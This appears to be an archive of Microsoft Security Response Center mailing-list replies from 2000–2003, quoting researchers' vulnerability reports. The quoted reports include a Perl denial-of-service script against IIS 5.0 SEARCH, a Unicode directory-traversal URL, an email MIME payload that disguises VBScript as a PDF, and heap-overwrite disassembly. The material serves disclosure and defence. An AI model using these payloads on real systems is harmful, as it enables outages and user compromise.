MS03-029 / Q823803 and RRAS Problems [im]

2003-07-29 Thread Microsoft Security Response Center
Microsoft is aware of a problem with the recently released security
patch MS03-029
(http://www.microsoft.com/technet/security/bulletin/MS03-029.asp) This
patch corrects a Moderate rated Denial of Service security vulnerability
in Microsoft Windows NT 4.0 Server.

Specifically there is a problem with the patch when installed on systems
that are also running RRAS (Routing and Remote Access Service) that
causes the RRAS Service to fail when the system is rebooted after
applying the patch. It is important to note that the security fix itself
is unaffected and the patch is still effective in correcting the DOS
flaw.

Microsoft is investigating this problem and will shortly issue a fix to
correct it once that fix has been thoroughly tested. The security
bulletin has been updated to reflect this. In the meantime customers
affected by the problem may take one of the following actions.

1. Contact Microsoft Product Support Services for a hot fix that
corrects the problem. This fix has not yet been extensively tested and
should therefore only be applied by customers who are directly affected
by the RRAS problem. 
2. Install the patch if you do not need the RRAS service. The RRAS
Service will fail to start however this will not impact normal
operations other than those that use the RRAS Service. 
3. Review the security bulletin and assess whether your enviroment
requires the security patch. 
4. Wait until a fix for the RRAS problem has been fully tested and
released. The security bulletin will be updated when this happens.

Regards,

Microsoft Security Response Center



Contact information for Microsoft Security Response Center [tf]

2003-07-04 Thread Microsoft Security Response Center
-BEGIN PGP SIGNED MESSAGE-

Periodically we hear people say they tried to contact Microsoft about
a product or service vulnerability and that Microsoft didn't respond.
 We are concerned that people may not know how to report security
vulnerabilities to Microsoft.
 
The Microsoft Security Response Center investigates all reports of
security vulnerabilities affecting Microsoft products. If you believe
you have found a security vulnerability affecting a Microsoft
product, we'd like to work with you to investigate it. 
 
You can contact the Microsoft Security Response Center by emailing
[EMAIL PROTECTED] directly, or you can submit your report via our
web-based vulnerability reporting form located at
https://www.microsoft.com/technet/treeview/default.asp?url=/technet/se
curity/bulletin/alertus.asp.

Sincerely,
Microsoft Security Response Center

-BEGIN PGP SIGNATURE-
Version: PGP 7.1

iQEVAwUBPwSbDI0ZSRQxA/UrAQH63Af/b+QJk1jCTiTBkNIpphqSOlA5tFgqYkBf
Iip5FnEXF/2QJsW8YVbmupnLnnH2ig8HxzpVqzGZ69QhYttpNmmf8v35NcGQAdcU
fYEKDl2SJxLxPiUPo6kAcO0yh/b37o/yqT/dfySn1gI2JDVCmhcOD/UM0eYEayIQ
yH24oxAJVNGy88SZXd41zU3BSz61hyAmeQOLOuHkUIG9FWSMUaT0MA7dr6wdyI7Q
ofCyhx+hmIC2RIShyhNu9Nt2xl+f8iJajzn9VorpsqrYCx/Pf8CixfL5di2HZUaN
kqWBimMETruC0P16quVzFZcKxCaPi+qJg4qt30oc1R1B+votptMlAA==
=PkAX
-END PGP SIGNATURE-


RE: XWT Foundation Advisory

2002-07-29 Thread Microsoft Security Response Center


-BEGIN PGP SIGNED MESSAGE-

Hi All -

We'd like to set the record straight as regards the advisory
published today by the XWT Foundation.  Microsoft thoroughly
investigated the issue described in the advisory, and discussed our
findings in detail with the advisory's author.  When the XWT
Foundation solicited a response from Microsoft to include in the
advisory, we prepared one that accurately reports the risk the issue
poses and the solution we developed.  It's a pity the XWT Foundation
chose not to honor its promise to include our response.  For the
record, this is the vendor response we provided:

=
Microsoft has investigated the issue discussed in the report, and
agrees that the issue is bona fide from a technical standpoint. 
However, because of the difficulties associated with exploiting it
(discussed below), Microsoft believes it is most appropriate to
address the issue via a service pack.  Accordingly, a fix has been
included in IE 6 Service Pack 1, which is due to be released shortly.

Among the barriers that an attacker would face in attempting to
exploit the vulnerability are the following:
* It could only be exploited if the user clicked a link within an
email - it could not be exploited without user interaction.
* It would require that the attacker host a DNS server, a fact that
would be traceable. 
* The attacker would need detailed information about the internals of
the user's network, such as intranet server names.
* If the intranet site were an HTTPS: site, a dialog would warn the
user that the name on the site's certificate did not match the domain
name.
* If the intranet site used cookie-based authentication, the attack
would fail because the attacker's site would be unable to
authenticate on behalf of the user
* The attack would not work against web servers configured to support
multiple host headers, with the exception of any content served up at
the "default" site.
==
=

Microsoft stands by its assessment of the issue.  Regards,

Microsoft Security Response Center


-BEGIN PGP SIGNATURE-
Version: PGP 7.1

iQEVAwUBPUXCqo0ZSRQxA/UrAQEztAf/Y3qYCwMDTBSqZR0UrXTj4kA3m6bGWa2l
6LlGtHdKlwtSxWvwdXjsapSbfdQhMthV2+onjWi2lGDS6eqzvKbqf2kzVBBf6mU7
p8KxvgcpWGz3LLqQ1YtmLM7SuGgHayUq5ny6AlTMoYI0ZUMD8R9rVyRSM+CTMkQx
irskV/2HbqmrA4K1BdTV59t6n96lA955KaQMfKChxjk/YmQuBb/77DO+UABEWpdE
N3Sq2OgZOZxElLdBP3Yq/+sei6ixxH3g0UoAH+nOTTvYZDaizMWOPDnhVcwyx6mC
R0lXp70xSB8OvUo89e27eLXz/FYmNBpv54b5gKGJ6HTzxl0YjjeolQ==
=Uzha
-END PGP SIGNATURE-



RE: Microsoft Security Bulletin MS01-040

2001-07-26 Thread Microsoft Security Response Center

Hi Paul -

There are several issues here, some of which relate to the mailer, some
of which involve Microsoft's signing process, and some of which involve
how the PGP product works.  I'll do my best to explain what's happening,
but if you have questions about using PGP, Network Associates is really
the authoritative information source. 

The signature status and the key validity are two different issues
entirely.  The signature status ("good" in your note below) means that
the signature was successfully verified.  This tells you that the email
hasn't been tampered with in transit, and that the public key you used
to verify it is the mate to the private key that was used to sign it.
What this does *not* tell you is whether the key is actually the
Microsoft key -- that's what the validitor indicator tells you.  In the
case you cited below, the validity indicator ("invalid") means that PGP
couldn't certify that the key actually is the Microsoft key.  There's a
fine shade of meaning here that's very important.  "Invalid" doesn't
mean that the key isn't the Microsoft, only that PGP couldn't confirm
that it's the Microsoft key.  PGP assesses the validity of a key by
seeing whether anyone you trust has vouched for its authenticity by
signing it.  In this case, it says that the key is invalid because
nobody you trust has signed it.  

As you noted, there are two signatures on the key.  One is a
self-signature; the other belongs to a group called MS-CERT.  Because
you don't have MS-CERT's key in your keyring, its signature on the key
is meaningless -- it doesn't have any bearing on the key's validity one
way or the other.  We don't ask other parties to sign our key because
there are over 150,000 subscribers to our notification service, and it's
unlikely that there is a key (or even a reasonable set of keys) that is
trusted by all of them.  Instead, we provide a different way to validate
that you've downloaded the bona fide Microsoft key.  You can download
the key via an SSL session, and when downloading the key you can check
the certificate to confirm that you're actually at the Microsoft web
site.  After downloading it, you can check the key's fingerprint against
the one posted on the download page and confirm that they're the same.
(BTW, you're right that the page on the mailer is currently returning an
error.  We're working to get it returned to service, but in the meantime
an alternative URL is
http://www.microsoft.com/technet/security/bulletin/notify.asp).

Because the validity assessment from PGP is based on whether someone you
trust has signed the key, you can, if you like, make the key valid by
signing it yourself.  However, there's no requirement to do this -- PGP
doesn't require that the be shown as valid in order to use it to verify
the signature.  If you do decide to sign the key, you should only do so
after confirming via one of the methods above that it really is the
Microsoft key.  Don't simply sign the key in order to make the error
message go away.   

You're right that the name on the signing key ([EMAIL PROTECTED]) is
different from the address that sent the email ([EMAIL PROTECTED]).
However, this has nothing to do with whether the signature can be
verified, nor does it have anything to do with PGP's validity
assessment.  When verifying the signature, PGP selects the right key in
your keyring based on the name associated with the signing key.  The
"from" address on the email doesn't play any part in verifying the
signature.  We use the [EMAIL PROTECTED] key to sign bulletin mailers
in order to minimize the number of Microsoft keys customers have to have
in their PGP keyrings.  We need to have a key that customers can use to
send us encrypted mail at [EMAIL PROTECTED], and we also need one we
can use to sign bulletin mailers.  We concluded that we could avoid a
certain amount of confusion by using the same key for both purposes.  

As you noted, there have been a number of bogus bulletin mailers
circulating lately, and it's a good idea to always confirm the signature
on any mailer you receive.  The signature verification on a mail could
fail for any of a number of innocuous reasons -- the Notification
Service's list server might flip a bit, the mail viewer on your local
machine might reformat the mail when displaying it, etc -- or it could
be a bogus mailer sent by a malicious user.  The signature verification
process doesn't give you any way to know which is the case.  Anytime the
signature verification fails, the best course of action is to visit
www.microsoft.com/technet/security and view the web-hosted version of
the bulletin.  The version on the web is always the authoritative
version.  

Hope that helps explain the situation.  There's more information on this
subject available at

RE: Vulnerability in Windows 2000 TELNET service

2001-07-26 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

Microsoft began an investigation into this issue as soon as we
learned of it, and are looking into this aggressively.

We've checked our records, but it doesn't appear that this report was
sent to [EMAIL PROTECTED]  

Just a reminder: the best place to send reports of security
vulnerabilities involving Microsoft products is [EMAIL PROTECTED]

Regards,
[EMAIL PROTECTED]

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.3

iQEUAwUBO2CZQY0ZSRQxA/UrAQEgTgf2II83/O/LYIynW22Q0/IMKF9N5MQ1RBb0
TTYxuVRiSEBTtCSzTMABmRr+WhDLgYJkIu3OLGEGukU8+Jqe1f4AcUI5DS9VJ1JS
+k3HzrPUxSXFlMvAqxF+KmXqOworL0o/6cQO3ToSONKuH6X/A+P/oJqMVjDr4GyD
QtSqOFRKUxdiUDl4FmLbUDrIzXkYTGPbhONIQUJBelTKsOKYaUdlKSKRqzdzBsBa
I/SEmkMpHIVMOr4/vM6J+fYDIpzE4INhI2UIctvnGg/+Wx2/Bf7mYoYfO5ryBfKP
C9S1wrsIEJtbDu6T9wQzGgXBRZsbdFi4ILextCdn8Q0Kjx0R9bfL
=XyGn
-END PGP SIGNATURE-



RE: Yahoo/Hotmail scripting vulnerability, worm propagation

2001-06-01 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

We are investigating this matter thoroughly and aggressively to
determine whether or not it is valid.  Contrary to the poster's
claim, we have not received any direct communications on this
possible (or alleged) vulnerability. 

Regards,

[EMAIL PROTECTED]

- -Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, May 30, 2001 5:18 PM
To: [EMAIL PROTECTED]
Subject: Yahoo/Hotmail scripting vulnerability, worm propagation


Title: Yahoo/Hotmail scripting vulnerability, worm propagation


Synopsis

Cross-site-scripting holes in Yahoo and Hotmail make it possible to
replicate 
a Melissa-type worm through those webmail services.


Description

An email is sent to the victim, who uses Yahoo Mail or Hotmail.
Inside the 
email is a link to yahoo or hotmail's own server. The link contains
escaped 
javascript that is executed when the page is loaded. That javascript
then 
opens a window that could nagivate through the victim's inbox,
sending messages 
with the malicious link to every email address it finds in the inbox.
Because 
the malicious javascript executes inside a page from the mail
service's 
own server, there is no domain-bounding error when the javascript is
controlling 
the window with the victim's inbox.


Who is vulnerable

Users of the Yahoo Mail and Hotmail service. Although the exploit
requires 
a user to click on a link, two things work for this exploit. (1) The
email 
comes from a familiar user (sent by the worm), and (2) The link is to
a 
familiar, trusted server. Theoretically, more services are
vulnerable, due 
to the proliferation of these holes, but the worm is limited to web
mail 
services.


Proof-of-Concept

Sample links and the worm code can be found at:
http://www.sidesport.com/webworm/


Solution

Escaping all query data that is echoed to the screen eliminates this
problem. 
This must be done on every page on a server that can send or read
mail for 
the service.


Vendor Status

Both Yahoo and Hotmail were notified on May 23 2001.


- -mparcens
[EMAIL PROTECTED]

Free, encrypted, secure Web-based email at www.hushmail.com

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOxbSOI0ZSRQxA/UrAQHWSQf/R6eyO2m+Yfev7noeY/JOGaLjQp6GC/AZ
EQCnSCfO9tfCVfOOabChwHn4OBQsMNSBlFPybbjVuXb35+YMqq7nV6X8rTpVnyg2
cSbA6Xma4dOfR0nA/OdPj6eBngN3kBfnRB7537z9fFJ1ryxq18ykge5+edp0Bdc1
4XXqkQT2K+Kid7vEj5+frYip2W1Dq1Ec2vnzSu6661OSfMdU1Rat4TdMLpJzZckV
HwUlRFg1dAxpVdkL0OGbrTHhD1h95UiGmQMbnZRFwk5xMK68u6UrbX13zILaEzCR
trtFmyF0LsyYqnRLPwMHmdSE6jZNY6ycVhbsj2+v8qyqyxMcEzuXCA==
=z0RA
-END PGP SIGNATURE-



Re: Microsoft ISA Server Vulnerability

2001-04-27 Thread Microsoft Security Response Center

Hi -

You're right that the root problem here is a heap corruption.  The
Knowledge Base article we published on the subject
(http://support.microsoft.com/support/kb/articles/q295/2/79.asp,
"Cause") notes that this is the case.  As part of our investigation, we
examined whether the heap corruption could, in this case, be exploited
to run code, but we were unable to find any way to do so.  If you can
demonstrate an ability to run code via the exploit, please contact us
immediately as we'd be most interested in investigating the issue
further.  Regards,

Scott Culp
Security Program Manager
Microsoft Corporation

-Original Message-
From: dark spyrit [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, April 26, 2001 2:17 PM
To: [EMAIL PROTECTED]
Subject: Microsoft ISA Server Vulnerability


Taken from the Microsoft bulletin -

"Could an attacker use the vulnerability to take control of the ISA
server?

No. This is a denial of service attack only. There is no capability to
usurp any administrative privileges.

Could an attacker use the vulnerability to breach the security of the
firewall?

No. There is no capability to use this vulnerability to lower the
security the firewall provides. It can only be used to prevent the Web
Proxy service from passing any data at all. "

Hmm I beg to differ.. after reading the advisory provided by the
SecureXpert team I decided to look for myself. Going by the info they
provided and a few slight buffer modifications we found ourselves
breaking at this point..

.text:0101D726 mov ecx, [eax]
.text:0101D728 pushedi
.text:0101D729 mov edi, eax
.text:0101D72B mov eax, [eax+4]
.text:0101D72E pushesi
.text:0101D72F mov [eax], ecx
.text:0101D731 mov [ecx+4], eax
.text:0101D734 callds:LeaveCriticalSection
.text:0101D73A mov eax, edi
.text:0101D73C pop edi
.text:0101D73D pop esi
.text:0101D73E retn

It takes a bit of register fiddling to get somewhere.. but is certainly
do-able.

The data at the offset of eax is referencing the tail end of the user
buffer sent (2 dwords). You can see by the code that you can now write
to any writeable memory location with any data you wish - stored return
address, saved exception handler.. whatever.

The heap corruption makes exploiting this a slightly random and volatile
exercise.. but we've had success getting code executing.

That's all, just wanted to prove a point.

Also, cash low.. need a new job.

dark spyrit/beavuh - doin it for the cause!



Re: ActiveSync can access a locked workstation w/o unlocking

2001-04-17 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

Hi Jeff,

We've checked our records, but are unable to find any record of a
mail from you to the Security Response Center.  If you did indeed
send to [EMAIL PROTECTED], could you send us a copy of the mail to
assist us in troubleshooting?

In regards to the behavior you described, there are three points that
are particularly important to keep in mind:

1. The desktop will only synchronize with a Pocket PC if a
partnership has previously been created, and a partnership can only
be created from the desktop side -- one can't be created by a Pocket
PC.

2. If a PIN has been selected for the Pocket PC, an attacker would be
unable to obtain any information from the device, regardless of
whether it had been synchronized. 

3. Even if an attacker obtained a Pocket PC for which a partnership
already had been created, and knew the PIN for the device, he or she
could only use it to obtain information from the desktop if
ActiveSync had been configured to automatically synchronize anytime a
device is connected.  

We'd like to make sure we've investigated the report fully.  If you
have seen cases outside of the above parameters, please let us know
immediately and we'll begin an investigation.  

Best regards,
Alex Uy
Security Program Manager
Microsoft Security Response Center

- -Original Message-
From: Jeff.Samples [mailto:[EMAIL PROTECTED]] 
Sent: Monday, April 16, 2001 5:06 AM
To: [EMAIL PROTECTED]
Subject: ActiveSync can access a locked workstation w/o unlocking


Microsoft was notified on 3/28/2001, you may use my name when
publishing this. I cannot register on your site, so I am trying the
general e-mail addresses.

Platforms tested: ===
Microsoft Windows 2000 Professional (build 2195) w/ SP1 Microsoft
ActiveSync 3.1 (tested using HP Jornada 540 Series running Windows
PocketPC (CE v 3.0.948 Build 9357)

Issue:
===
MS ActiveSync can access files (Outlook appts, contacts, synced
files, etc) from a Win2K workstation even though the workstation has
been locked.  By simply dropping the HP into the dock, or hooking it
up to the COM port(depending on which sync method is configured), it
will sync and download data from a "locked" workstation. Yikes!

Jeffrey A. Samples,
Vice President, Product Development
TERRADON Communications Group
<http://www.terradoncommunications.com/>
ph. - 304.755.1324
fx. - 304.755.8274

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOttX3I0ZSRQxA/UrAQFthAf+PCus+UwNxYMiKN4o0wQs7a9qVQgKNT1q
0tBzXIpEl4xP+jhTBjKUNsxd7qawNrNL1U9om86Uqv2k67LdcfSyK6TexRBKXQuv
jPUqDJs/U8kyq6gu4sbGcDM0brnX12JyyBHO98yU36Cyz6+LSgHUMM9ACIGMEbUN
I9na5qAWjROtd5V25L9dgj2BT32b7wXlCccBjXdqPiDDRTbgV1DMTTo5+ORYQIP8
1ymFPa/PhyxXVQ7cLT7RLknPwKXhGJDk7+K9lblfVR7lEmHzY5OEqGtRUbY4q31B
1L47a1W5S+R/Iufc+UUDi0dQpE6lg5O9dGoaFo6lNcFxe4LG1nPsRA==
=I4p2
-END PGP SIGNATURE-



Re: User may be fooled to execute programs browsing with IE5.1

2001-04-03 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

Hi Jesus -

I'm afraid the situation may not be what you believe.  First, your
system is not patched, despite what the dialogue says.  The dialogue
is displayed if you try to install the patch on anything other than
IE 5.01 Service Pack 1 or IE 5.5 Service Pack 1, and the text of the
dialogue is incorrect.  This error has been present in several recent
IE patches, and we're working to ensure that it's not present in
future ones.  Meantime, here's the passage from the bulletin that
discusses it:

 start --
Caveats:
If the patch is installed on a system running a version of IE
other
than the one it is designed for, an error message will be displayed
saying that the patch is not needed. This message is incorrect, and
customers who see this message should upgrade to a supported version
of IE and re-install the patches. 
 end --

We checked the code you provided below, and have verified that the
behavior you're seeing is not a vulnerability.  Although you're right
that it's possible for a web site to initiate a file download, this
is by-design behavior and is unrelated to the vulnerability discussed
in MS01-020.  A Q&A in the FAQ discusses the situation:

 start --
I heard that even after applying this patch, an e-mail could
start a
file download automatically. Is this true?
Yes. However, this is not related to this vulnerability, and
doesn't
pose a security risk. It's always possible for an e-mail to start a
file download, and of course the author of the mail can give the file
a name that sounds innocuous. However, the file download cannot
actually begin unless and until the user selects a location to which
it should be downloaded, and clicks the OK button. 
As a general rule, it is probably worth questioning the
trustworthiness of any e-mail that automatically starts a file
download. The best action is to simply click the Cancel button in the
dialogue. 
 end --

Hope that helps explain the situation.  Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center


- -Original Message-
From: Jesús López de Aguileta [mailto:[EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]> ] 
Sent: Monday, April 02, 2001 1:12 PM
To: [EMAIL PROTECTED]
Subject: User may be fooled to execute programs browsing with IE5.1


Hi,

Playing with Cuartango´s recently exploit
(http://www.kriptopolis.com/cua/eml.html
<http://www.kriptopolis.com/cua/eml.html> ) I've found that it´s
possible to trick an user to execute one file making he/she think
it's a data file of any kind (pdf, mpeg,...).

This works on both NT and 2000 using IE 5.1 (other platforms/IE
versions not tested).

I have already downloaded the MS01-20 patch in the systems tested but
both appears to be  not vulnerable to Cuartango's exploit (msgbox:
"This update does not need to be installed on your system"), probably
because both have updated Media Player 7 installed.

I think this is a completely different  issue and excuse me if it's
previously solved/commented.

Detail:

- 8<cut here---8<

From: "Ripped from Juan Carlos Garcia Cuartango"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
 type="multipart/alternative";
 boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal

- --1
Content-Type: multipart/alternative;
 boundary="2"


- --2
Content-Type: text/html;
 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable





cid:donthurtme.pdf height=3D0 width=3D0>
Done  

- --2--

- --1
Content-Type: application/x-shockwave-flash;
 name="hola.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: 

msgbox("Hello")

- --1

- 8<--cut here-8<

Making an .eml file with the above content and browsing it with IE 5,
displays a window for download or online browse the "FILE" (not
program) "donthurtme.pdf". If the user choose to online browse it,
the VBscript code execute.

Another interesting issue is that, when replacing: mime 1 part with:

- --1
Content-Type: application/;
 name="hola.pdf%00.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: 

msgbox("Hello")

- --1

IE truncate in the popup window the name displaying  "hola.pdf"
instead of "hola.pdf%00.vbs", making the user thinks that the
extension of the program is different. Notice that in this second
case, IE properly ask for  "Run this PROGRAM" or "Save this PROGRAM",
only the extension may confuse the user.

Regards and excuse my poor English.

Jesus Lopez de Aguileta

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.3

iQEVA

Re: Microsoft - Personal Web Server Extended UNICODE Directory Traversal Vulnerability

2001-03-20 Thread Microsoft Security Response Center

Hi All -

Personal Web Server is, of course, not intended to host web sites on the
Internet.  It's only intended to be used in protected environments such
as home networks and the like.  If you're hosting an Internet site, IIS
is the appropriate product to use.  Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center

-Original Message-
From: Dinos Pastos [mailto:[EMAIL PROTECTED]] 
Sent: Sunday, March 18, 2001 2:16 AM
To: [EMAIL PROTECTED]
Subject: Microsoft - Personal Web Server Extended UNICODE Directory
Traversal Vulnerability


Hi all...

Just wanted to point out that while testing my Default installation of
Windows 98 running Microsoft Personal Web Server that came with the
Windows98 SE CD I discovered that the famous IIS 4/5 Unicode Directory
Traversal Vulnerability applies also to this Server just as bad as in
IIS.

The exploit method is the same :
http://PWS-server/scripts/..%c1%9c../windows/notepad.exe

I wont go in to detail on how to exploit a Windows machine... (Sorry
script kiddies)...

Patches: Dunno.
Quickfixes: Use Linux.

Dinos Pastos - [EMAIL PROTECTED]
Security Advisor



Re: IIS 5.0 SEARCH method overflow

2001-03-19 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

The patch released for Microsoft Security Bulletin MS01-016 resolves
this issue. 

Regards,

[EMAIL PROTECTED]

- -Original Message-
From: Georgi Guninski [mailto:[EMAIL PROTECTED]] 
Sent: Friday, March 16, 2001 12:09 PM
To: [EMAIL PROTECTED]
Subject: IIS 5.0 SEARCH method overflow


Georgi Guninski security advisory #39, 2001

IIS 5.0 SEARCH method overflow

Systems affected:
IIS 5.0

Risk: Unknown, may be very serious
Date: 16 March 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may
distribute it unmodified. You may not modify it and distribute it or
distribute parts of it without the author's written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies, especially
the fact that Georgi Guninski is not liable for any damages caused by
direct or  indirect use of the information or functionality provided
by this advisory or program. Georgi Guninski bears no responsibility
for content or misuse of this advisory or program or any derivatives
thereof.


Description:

This may be a duplicate of my advisory #38 -
http://www.guninski.com/iispropover.html
sorry if this is the case.
Microsoft did not answer my question whether it is the same issue. By
sending valid (not malformed :) ) but long SEARCH request to IIS 5.0
it is possible to restart all IIS related services.

The interesting point is the stack seems to be smashed and I believe
this may lead to executing arbitrary code though I have not achieved
it.


Details:
- --vv6.pl-
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; } $port = @ARGV[1];
$host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow
$xml='SELECT DAV:displayname from
SCOPE("'.$over.'")'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do  vv(126000,"V");
sleep(1);
do  vv(126000,"V");
#Try 125000 - 128000
- ---

Workaround: some of the revisions of MS01-16 solves this issue, yet I
do not recommend using IIS in production environment.

Vendor status:
Microsoft was informed on 11 March 2001

Regards,
Georgi Guninski
http://www.guninski.com

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOrLXnY0ZSRQxA/UrAQGtAAf/fEOa0d0pkHpELUEGhc6B/O1/X+vnEDGS
ghWJ3KWHjQfeoZVwBav9nRkJXqxY+BEuIts1RoYl2lwNftFKGuxudIj23tYLJ/a7
gWrImwYyImdB1AEJhTSJ/ImNiNrN9EnWvuBF4eBiKQVh2NbNdiiwSlLEVP3IK5WS
UFlUbbq+LXjb++J6CZjYFxIbRung1jIOk8V+3yH0CpvVWjX8uFfeZnJs7aArqtm6
6Oaglal4z4TmopDL5j6a+OplLKhKIWLQ85w8NWpA6bwOw2O69XdzLrYYi4eoI0md
rRHKSlJOmEk9PVeZDrLZuSqA8fUzjH+1yVUTsHuNoSmQokIv4/GCmw==
=xRhW
-END PGP SIGNATURE-



NIPC Advisory Regarding Recent Attacks Against E-commerce Sites

2001-03-08 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

Hi All -

As you may be aware, the FBI's National Infrastructure Protection
Center (NIPC) released an advisory today
(http://www.nipc.gov/warnings/advisories/2001/01-003.htm) detailing
recent attacks against e-commerce and e-banking sites.  Virtually all
of these attacks were carried out via known vulnerabilities for which
patches have been available for months or, in some cases, years.

Microsoft shares NIPC's concern about these attacks, and would like
to ensure that all customers have taken the needed steps to protect
their systems.  We have published a companion article to the NIPC
advisory, available at
http://www.microsoft.com/technet/security/nipc.asp, that details the
vulnerabilities involved in these attacks and the steps customers
should take to ensure the security of their systems.  If you haven't
applied the patches for these vulnerabilities, please take the time
to do it immediately.  Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center


-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOqg7SY0ZSRQxA/UrAQFncwgAnH88mUgXdvcFE8RV1Cp1Bd1fq5B2P9w4
wKQ8u1b/iILsAVthiE7poqecBjHc9kPgJuLDRlpZbx/Tgk7YS+nfKWjmd2KK04Ea
ST88V9yBzsNzkK4rQ3FIgwvjeoqNxw4+/trFGbvNDTM6fj5iKqXXiLnNv9oZO2dD
Itg+dQ7GSo0OlZBBKrXksGEfEazM7WEx4mV9uiGpSpw6HTz2pS7GBn48E+YVfaZN
g93CAOH3/fbt4HT4+LrBXJpeKc4fH+VVyBg4sFCEcL/n69gQhfAb3e+BWwJ3u46Q
82Ho/I10mf1zbqAAhCVGqPSN3zucaZpaUWBrrGgVQJTXLPA9D9aDIw==
=Mb4X
-END PGP SIGNATURE-



Re: DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1 .0

2001-01-15 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

Hi All,

Because this report makes some rather serious claims, and was sent to
BugTraq at the start of a holiday weekend, we've been treating it as
an urgent issue.  We were concerned that, if the report were correct,
malicious users might attack web sites while the system
administrators were home for the weekend.  We therefore called the
IIS Security Team into the lab early this morning, and they worked
throughout the day and well into the night in an effort to reproduce
the denial of service the report describes.

However, even after a thorough investigation using a lab setup that
mirrors the one discussed in the report, we have not seen a denial of
service.  We contacted the author of the report, and he provided
network traces from his system.  But even when we replayed them
against our lab setup, we did not see the server become unresponsive.
 (In fact, we noticed that even in the author's network trace, the
servers continued to respond, albeit slowly, throughout the trace).
At this point, we hypothesize that what appeared to be a denial of
service have may actually been a case of flooding.  We've seen cases
today in which the high bandwidth of the lab setting enabled the
client to generate invalid requests faster than the server could
process them.  (The inclusion of the %0%0 in the URL does marginally
increase the work factor required to parse the request).  However, in
every case, the server's performance returned to normal when the
flooding ceased, and it did (eventually) respond appropriately to
every request.

Nevertheless, we are continuing to investigate this issue.  If anyone
is able to reproduce the reported denial of service, we'd be most
interested in any information you could provide.  Please contact us
at [EMAIL PROTECTED]  Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center



- -Original Message-
From: NtWaK0 [mailto:[EMAIL PROTECTED]]
Sent: Saturday, January 13, 2001 8:53 AM
To: BUGTRAQ; Microsoft Security Response Center
Subject: DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
Importance: High


__

  NtWaK0,  SecurHack. Labs
Security Advisory  1-13-2001
DOSSING IIS 4  or IIS5 fully  patched using GET  /%0%0 HTTP/1.0
__

oo
Vulnerable Systems
oo
IIS 4 and IIS 5 even if fully patched.


Synopsis


While playing with miner in retina I  sent this GET /%0%0 HTTP/1.0 to
one
of my
IIS  4  and IIS  5  servers, I  noticed  that retina  is  taking a
lot  of
time
to jump to the next defined variable in the brain.ini which should be
GET
/%0%1
and so on.

Retina Result
o

Command: GET /%0%0 HTTP/1.0
Notes::  Connection to server lost.
Error::  10060

Command: GET  /_vti_inf.html%0%0 HTTP/1.0
Notes::  Connection  to server  lost.
Error::  10060 Command:
GET  /_vti_inf.html%0%0 HTTP/1.0
Notes::  Connection  to server lost.
Error::  10060

Pinging the box while running retina even from different subnet it
wont
answer.
You can connect to the web but you have to wait forever for it to
load.
I have tried that on IIS 4 and II 5 and same result 


Proof-Of-Concept


1- Get Retina From eeye.com
2- Install it
3- Edit the file Brain.ini located
   C:\Program Files\Retina 2.0\Modules\Retina\Miner\brain.ini



Re: Hotmail security hole - injecting JavaScript in IE using "@im port url(http://host/hostile.css)"

2000-04-25 Thread Microsoft Security Response Center

-BEGIN PGP SIGNED MESSAGE-

Hi All -

Wanted to advise that we've already corrected our servers to eliminate
this vulnerability as of 4:00 PM PST today.  Regards,

[EMAIL PROTECTED]

- -Original Message-
From: Georgi Guninski [mailto:[EMAIL PROTECTED]]
Sent: Monday, April 24, 2000 6:09 AM
To: [EMAIL PROTECTED]
Subject: Hotmail security hole - injecting JavaScript in IE using
"@import url(http://host/hostile.css)"


Georgi Guninski security advisory #11, 2000

Hotmail security hole - injecting JavaScript in IE using "@import
url(http://host/hostile.css)"

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Hotmail allows executing JavaScript code in email messages using
"@import url(http://host/hostile.css)",
which may compromise user's Hotmail mailbox when viewed with Internet
Explorer.
